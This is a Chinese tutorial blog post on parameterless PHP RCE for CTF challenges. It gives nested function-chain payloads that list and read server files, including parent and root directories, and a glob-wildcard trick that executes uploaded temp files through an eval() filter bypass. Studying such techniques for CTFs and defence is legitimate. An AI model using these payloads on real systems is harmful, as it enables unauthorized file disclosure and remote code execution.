php读参数文件下载,php rce之无参数读文件

最新推荐文章于 2024-06-01 23:11:24 发布
最新推荐文章于 2024-06-01 23:11:24 发布
阅读量212 收藏
点赞数
文章标签: php读参数文件下载

一、什么是无参数?

就是使用函数的时候不能带有参数。

可以是a()、a(b())或a(b(c())),但不能是a('b')或a('b','c'),不能带参数

所以我们要使用无参数的函数进行文件读取或者命令执行。

二、无参数文件读取查看当前目录文件名

通常,可以使用print_r(scandir('.'))查看当前目录下所有文件,以数组的形式输出。

abadfecc2ce845fd7e2be6dc6b6cca50.png

但是要怎么构造参数里这个点呢。

fce5569cf9d4e84db902059dd2c3f5a7.pngcurrent() 返回数组中的单元,默认第一个值。

所以我们输出print_r(scandir(current(localeconv())));也会如同print_r(scandir('.'))打印当前目录下文件名。

使用print_r(scandir(pos(localeconv())));,pos是current的别名

reset()函数将内部指针指向数组中的第一个元素,并输出。相关的方法:- 返回数组中的当前元素的值

- 将内部指针指向数组中的最后一个元素,并输出

- 将内部指针指向数组中的下一个元素,并输出

- 将内部指针指向数组中的上一个元素,并输出

- 返回当前元素的键名和键值,并将内部指针向前移动

cf10559194a46c45f39c9b605f97fd30.png

所以我们现在要构造reset()的参数。

chr(46)就是字符..所以我们需要构造 46 .chr(rand())   # 需要看运气。。。不现实

char(time())

char(current(localtime(time())))chr(time())

chr() 函数以256为一个周期,所以chr(46)、chr(302)、chr(558)等都等于.

所以使用chr(time()) 一个周期必能出现一次。

chr(current(localtime(time())))

localtime()以数值数组和关联数组的形式输出本地时间:关联数组的键名如下:[tm_sec] - 秒数

[tm_min] - 分钟数

[tm_hour] - 小时

[tm_mday] - 月份中的第几天

[tm_mon] - 年份中的第几个月,从 0 开始表示一月份

[tm_year] - 年份,从 1900 开始

[tm_wday] - 星期中的第几天 (Sunday=0)

[tm_yday] - 年中的第几天

[tm_isdst] - 夏令时当前是否生效

数组第一个值每秒加 1 ,所以最多 60 秒之内就可以得到 46 .然后用current()函数即可获得 第一位键值。再利用 chr() 函数就可以完美获得.

phpversion()返回 PHP 版本,例如 5.4.45

floor(phpversion()) 返回 5

sqrt(floor(phpversion())) 返回 2.2360679774998

tan(floor(sqrt(floor(phpversion()))))返回-2.1850398632615

cosh(tan(floor(sqrt(floor(phpversion())))))返回4.5017381103491

sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))返回45.081318677156

ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))返回46

chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))返回"."

21a7b01f9242eff6f969624dd1338187.png

crypt()返回使用 DES、Blowfish 或 MD5 算法加密的字符串。

hebrevc() 函数把希伯来文本从右至左的流转换为左至右的流。同时,把新行(\n)转换为

hebrevc(crypt(arg))可以随机生成一个hash值,第一个字符随机是$(大概率) 或者 "."(小概率) 然后通过chr(ord())只取第一个字符/

ord()返回字符串中第一个字符的Ascii值

print_r(scandir(chr(ord(hebrevc(crypt(time()))))));多试几次。

2233b5a38a16d5db3d9fccd9de4f838f.png

strrev(crypt(serialize(array())))也可以得到".",只不过crypt(serialize(array()))的点出现在最后一个字符,需要使用strrev()逆序,然后使用chr(ord())获取第一个字符.

681a37039e1b8d32df46c8bd96264302.pngprint_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));

绝对路径

正常的,我们还可以用print_r(scandir('绝对路径'));来查看当前目录文件名。

获取绝对路径可用的有getcwd()和realpath('.')

21489c622d77acbcc781fa944492f810.png

所以我们还可以用print_r(scandir(getcwd()));输出当前文件夹所有文件名.

2f42fd3d225e4b64f1d036de33af7cd3.png

读取当前目录文件

通过前面的方法输出了当前目录文件名,如果文件不能直接显示,比如PHP源码,我们还需要使用函数读取:

前面的方法输出的是数组,文件名是数组的值,那我们要怎么取出想要读取文件的数组呢:- 将数组的内部指针指向最后一个单元

- 从关联数组中取得键名

- 返回数组中当前的键/值对并将数组指针向前移动一步

- 将数组的内部指针倒回一位

- 将数组的内部指针指向第一个单元

- 将数组中的内部指针向前移动一位

如果要获取最后一个文件内容,我们可以:show_source(end(scandir(getcwd())));

# 或者使用其他函数

readfile

highlight_file

file_get_contents

readgzfile()    # 也可读文件,常用于绕过过滤

报错Strict Standards: Only variables should be passed by reference in原因:PHP5.3以上默认只能传递具体的变量,而不能通过函数返回值传递,没有关系不影响我们读文件。array_reverse() 以相反的元素顺序返回数组

本来在最后一位的文件可以反过来放第一位读取。show_source(current(array_reverse(scandir(getcwd()))));

如果是倒数第二个我们可以用:readfile(next(array_reverse(scandir(getcwd()))));

我想着还可以继续用next()结果不行。

那么如何读取其他文件array_flip() 函数用于反转/交换数组中的键名和对应关联的键值。

array_rand() 函数返回数组中的随机键名,或者如果您规定函数返回不只一个键名,则返回包含随机键名的数组。

我们可以使用array_rand(array_flip()),array_flip()是交换数组的键和值,array_rand()是随机返回一个数组。readfile(array_rand(array_flip(scandir(getcwd()))));

readfile(array_rand(array_flip(scandir(current(localeconve())))));

903ff917dfaf3c759ce604c2aba6c0eb.png

如果目标文件不在当前目录呢?dirname() :返回路径中的目录部分,

d882230c3a1ec229dac6b5a8caba5f22.png

从图中可以看出,如果传入的值是绝对路径(不包含文件名),则返回的是上一层路径,传入的是文件名绝对路径则返回文件的当前路径

chdir() :改变当前工作目录print_r(scandir(dirname(getcwd()))); //查看上一级目录的文件

构造".."

print_r(next(scandir(getcwd())));:我们scandir(getcwd())出现的数组第二个就是"..",所以可以用next()获取print_r(scandir(next(scandir(getcwd()))));//也可查看上级目录文件

结合上文的一些构造都是可以获得".."的 :next(scandir(chr(ord(hebrevc(crypt(time()))))))

读取上级目录文件

直接print_r(readfile(array_rand(array_flip(scandir(dirname(getcwd()))))));是不可以的,会报错,因为默认是在当前工作目录寻找并读取这个文件,而这个文件在上一层目录,所以要先改变当前工作目录,前面写到了chdir(),使用:show_source(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd())))))));

如果不能使用dirname(),可以使用构造".."的方式切换路径并读取:

但是这里切换路径后getcwd()和localeconv()不能接收参数,因为语法不允许,我们可以用之前的hebrevc(crypt(arg))show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(getcwd())))))))))));

或更复杂的:

show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))));

还可以用:

show_source(array_rand(array_flip(scandir(chr(current(localtime(time(chdir(next(scandir(current(localeconv()))))))))))));//这个得爆破,不然手动要刷新很久,如果文件是正数或倒数第一个第二个最好不过了,直接定位

还有:if(chdir(next(scandir(getcwd()))))show_source(array_rand(array_flip(scandir(getcwd()))));

查看和读取根目录文件print_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));

strrev(crypt(serialize(array())))所获得的字符串第一位有几率是/,所以使用以上payload可以查看根目录文件.

但是有权限限制,linux系统下需要一定的权限才能读到,所以不一定成功.if(chdir(chr(ord(strrev(crypt(serialize(array())))))))print_r(scandir(getcwd()));

if(chdir(chr(ord(strrev(crypt(serialize(array())))))))show_source(array_rand(array_flip(scandir(getcwd()))));

利用通配符临时文件<?php

if(isset($_GET['code'])){

$code=$_GET['code'];

if(strlen($code)>35){

die("Long.");

}

if(preg_match("/[A-Za-z0-9_$]+/",$code)){

die("NO.");

}

eval($code);

}else{

highlight_file(__FILE__);

}

因为$不能使用了,所以我们无法构造PHP中的变量。

如何利用无字母、数字、$的系统命令来getshell?shell下可以利用.来执行任意脚本

Linux文件名支持用glob通配符代替

.或者叫period,它的作用和source一样,就是用当前的shell执行一个文件中的命令。比如,当前运行的shell是bash,则. file的意思就是用bash执行file文件中的命令。

用. file执行文件,是不需要file有x权限的。那么,如果目标服务器上有一个我们可控的文件,那不就可以利用.来执行它了吗?

这个文件也很好得到,我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小写字母。

第二个难题接踵而至,执行. /tmp/phpXXXXXX,也是有字母的。此时就可以用到Linux下的glob通配符:*可以代替0个及以上任意字符

?可以代表1个任意字符

那么,/tmp/phpXXXXXX就可以表示为/*/?????????或/???/?????????。

能够匹配上/???/?????????这个通配符的文件有很多.

大部分同学对于通配符,可能知道的都只有*和?.

其中,glob支持用[^x]的方法来构造“这个位置不是字符x”。那么,我们用这个姿势干掉一些干扰选项。

就跟正则表达式类似,glob支持利用[0-9]来表示一个范围。

所有文件名都是小写,只有PHP生成的临时文件包含大写字母。那么答案就呼之欲出了,我们只要找到一个可以表示“大写字母”的glob通配符,就能精准找到我们要执行的文件。

翻开ascii码表,可见大写字母位于@与[之间:

7ff89310a7d1f878d3b3bb0b4a9c91d5.png

那么,我们可以利用[@-[]来表示大写字母:

构造 poc ,执行任意命令。

当然,php生成临时文件名是随机的,最后一个字符不一定是大写字母,不过多尝试几次也就行了。

最后,我传入的code为?c=. /???/????????[@-[],发送数据包如下:#!/bin/sh

ls

1469341b175fb6919db640cf7890fc3c.png

三、无参数命令执行(RCE)

我们可以使用无参数函数任意读文件,也可以执行命令。<?php

if(';'===preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {

eval($_GET['code']);

} else{

show_source(__FILE__);

}

我们传入一个参数,然后经过正则替换后剩余 分号;方可执行我们的payload.

代码非常清晰,首先preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])

代码会将$_GET['code']中满足正则/\W+((?R)?)/的部分,替换为空,然后查看是否剩下的部分强等于;如果满足,则执行eval($_GET['code']);

否则什么都不做。那么思路很明确,我们弄清楚正则即可进行RCE[^\W]+\((?R)?\)

首先是[^\W]对于\W,其意思等价于[^A-Za-z0-9_]。那么我们知道,我们的input必须以此开头然后是括号匹配\( ...... \)

括号中间为(?R)?

意思为重复整个模式简单理解,我们可以输入以下类型a(b(c()))

但我们不能加参数,否则将无法匹配,正则替换掉其他之后,甚于的不是只有分号,所以不强等于 左边的;a(c,d)

所以正则看完,题目的意思非常明确了:我们只能input函数,但函数中不能使用参数,否则判断句右边经过替换,将不止剩余分号;。

既然传入的code值不能含有参数,那我们可不可以把参数放在别的地方,code用无参数函数来接收参数呢?这样就可以打破无参数函数的限制:

3.1 getenv()

查阅php手册,有非常多的超全局变量$GLOBALS

$_SERVER

$_GET

$_POST

$_FILES

$_COOKIE

$_SESSION

$_REQUEST

$_ENV

我们可以使用$_ENV,对应函数为getenv()getenv — 获取一个环境变量的值

首先想到headers,因为headers我们用户可控,于是在PHP手册中搜索:headers。

参考:

白字不白
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php参数函数实现rce,浅谈无参数RCE
weixin_30568317的博客
04-02 1873
0x00 前言这几天做了几道无参数RCE的题目,这里来总结一下,以后忘了也方便再捡起来。首先先来解释一下什么是无参数RCE:形式:if(';' === preg_replace('/[^W]+((?R)?)/', '', $_GET['code'])) { eval($_GET['code']);}preg_replace('/[a-z]+((?R)?)/', NULL, $code)pre_ma...
参数rce
qi_SJQ_的博客
08-10 220
getcwd():返回当前目录的绝对路径------返回路径 scandir() :列出指定路径中的文件和目录,返回的是数组!-----利用路径(目录) print_r() :以易于理解的格式打印变量-----输出 怎么构造? localeconv() :返回一包含本地数字及货币格式信息的数组,而数组第一项就是".",因此要再用一个函数取出这个点。可以current(localeconv())返回“.”。 故:var_dump(scandir(current(localeconv())));----遍历当
PHP参数RCE
weixin_43610673的博客
03-14 2844
参数函数RCE,即在不使用参数的条件下,仅使用函数进行REC。 如:代码中有 if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } 这时如果我们用传统的eval($_POST[‘code’]); 则无法通过正则的校验 /[^\W]+((?R)?)/ 对于...
vulhub中PHP利用GNU C Iconv将文件取变成RCE(CVE-2024-2961)
最新发布
yougexiaojiuguan的博客
06-01 641
漏洞复现过程的记录
php参数函数实现rce,PHP Parametric Function RCE
weixin_42303721的博客
04-02 517
前言最近做了一些 php参数函数执行的题目,这里做一个总结,以便以后 bypass 各种正则过滤。大致思路如下:1. 利用超全局变量进行 bypass,进行 RCE2. 进行任意文件取什么是无参数函数 RCE传统意义上,如果我们有:eval ( $_GET [ ’ code ’ ] ) ;即代表我们拥有了 " 一句话木马 ",可以进行 getshell,例如:但是如果有如下限制:if ( ’...
php无参执行RCE
遇事不决冲冲冲
03-23 3144
php无参执行RCE一般来说当我们可以控制或自己上传一个木马后,就可以进行任意命令执行,但像上面这样`/[^\W]+\((?R)?\)/`的正则过滤方式,我们不能输入任何参数,这样想绕过的话一个大的思路就是通过套娃,通过让一个函数的返回值作为另一个函数的参数,也就是这样`a(b(c()));`,最终达到rce的效果,下面列几种绕过方法
CTFweb无参数RCE
遇事不决冲冲冲
07-25 2935
1 打开题目便是源代码,通过a的参数来实现RCE <?php #-*-coding: utf-8 -*- //flag in show_flag.php if(isset($_POST['a'])){ $a=$_POST['a']; if (!(preg_match("/[0-9]|\.|data|phar|glob|\*|system|shell_exec|shell|php|\`/i", $a))) { eval($a); } }else{ hig
[GXYCTF2019]禁止套娃(无参数函数RCE
EC_Carrot的博客
11-04 424
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 参考链接: https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/#什么是无参数函数RCE https://www.cnblogs.com/wangtanzhi/p/12260986.html 什么是无参数函数RCE 传统意义上,如果我们有eval($_GET['code']); 即代表我们可
php 让函数的参数可有可无(可以不传递参数)
01-08
前言 正常情况下,函数一旦声明参数,调用时就必须传入,否则会报错: function demo($e){ return $e; } echo demo(); // Uncaught ArgumentCountError: Too few arguments to function xxxx() 那么如何实现 想传参就传,不想传就不传呢? 实现 很简单,只需要 将形参指定默认值为空即可,下面给出一个演示: function demo($e = ''){ return $e; } echo demo();// echo demo('hello, world!');//hello,
php递归匹配以及无参数文件
Sacrifice_li的博客
10-05 267
1. php正则匹配-递归匹配 例如: preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']) 其中[^\W]+ 表示任意的字符和数字以及下划线,匹配1次或者多次 然后是匹配 "(" 一次 然后是(?R)? 表示递归匹配 也就是表示当前的正则匹配pattern这整个式子,(?R)代表的是整个式子,而最后一个?表示的是给予这个递归一个终止信号,因为?可以表示0次或者1次,所以同样可以用*来代替。当然这里?以及*可能出现递归栈的不同。 综上所述:该正则可以匹
Web1 命令执行(三)
weixin_53896576的博客
02-07 462
7. 无参 RCE 构造 https://blog.csdn.net/qi_SJQ_/article/details/119457821 算是一种特殊的绕过方式,套娃形式,数学函数的理解,不过未限制长度。 chr():根据ascii码值将数字转换成字符串 get_defined_vars() 获取题目相关变量 print_r() 函数用于打印变量,以更容易理解的形式展示 localeconv():是一个编程语言函数,返回包含本地数字及货币信息格式的数组。其中数组中 的第一个为点号(.) pos():
参数文件RCE总结
蚁景网安学院
07-06 2797
引言代码解析无参数任意文件取查看当前目录文件当前目录文件查看上一级目录文件取上级目录文件查看和取多层上级路径的就不写了,一样的方式套娃就行查看和取根目录文件参数命令执行...
php参数函数实现rce,无参数文件RCE总结
weixin_28759987的博客
04-02 754
chr(time)chr(current(localtime(time)))chr(time) :chr 函数以256为一个周期,所以 chr(46) , chr(302) , chr(558) 都等于 "."所以使用 chr(time) ,一个周期必定出现一次 "."chr(current(localtime(time))) :数组第一个值每秒+1,所以最多60秒就一定能得到46,用 curre...
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
php无参rce,php中无参函数的RCE
weixin_30920907的博客
03-17 306
学习一下php中无符号的问题。1.无参数}else{show_source(__FILE__);}?>这里调用函数只能是code(a()) 也就是括号中不能含有参数。http-header传参在session_id中设置我们想要输入的RCE,达到传参的目的,但是第一点需要session_start()开启session会话。payload:code=eval(hex2bin(session_...
参数函数RCE
weixin_53146913的博客
07-19 1765
1.利用超全局变量进行bypass,进行RCE 2.进行任意文件
php参数函数利用
L1ni01
10-24 1863
php参数函数利用 1.我们先看一道题目 无参数的意思可以是a()、a(b())或a(b(c())),但不能是a(‘b’)或a(‘b’,‘c’),不能带参数 由 题目中的正则我们可以发现,我们无法写参数进去,只能用 a(b(c())) 这种方式进行rce,这题过滤的是中文 的 () 所以不要多想。(出题人的小技巧,哈哈) 介绍无参数函数绕过所需要利用的函数 方法1:getenv() 查阅php手册,有非常多的超全局变量 $GLOBALS $_SERVER $_GET $_POST $_FILES $_
GXYCTF2019&GWCTF2019——Writeup
Lethe's Blog
03-03 3287
GXYCTF Ping Ping Ping 进入题目后,提示了 /?ip=,于是加上参数 ?ip=1试试看,发现是执行了ping命令: 然后尝试: ?ip=;ls 发现成功执行了命令,但是当取 flag.php 时,发现过了空格,尝试下面两种绕过方式 ${IFS} $IFS$9 使用第二个$IFS$9代替空格成功绕过,执行 ?ip=;cat$IFS$9flag.php,发现 flag...
rConfig v3.9.2 RCE漏洞详析:两个关键文件的攻击向量
第二个漏洞存在于search.crud.php文件中,同样涉及RCE。这次,攻击者需要发送包含两个参数的GET请求,其中`searchTerm`参数可以被任意填充,但至关重要的是,该参数必须存在。这个漏洞的复杂性在于,攻击者需要构造...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值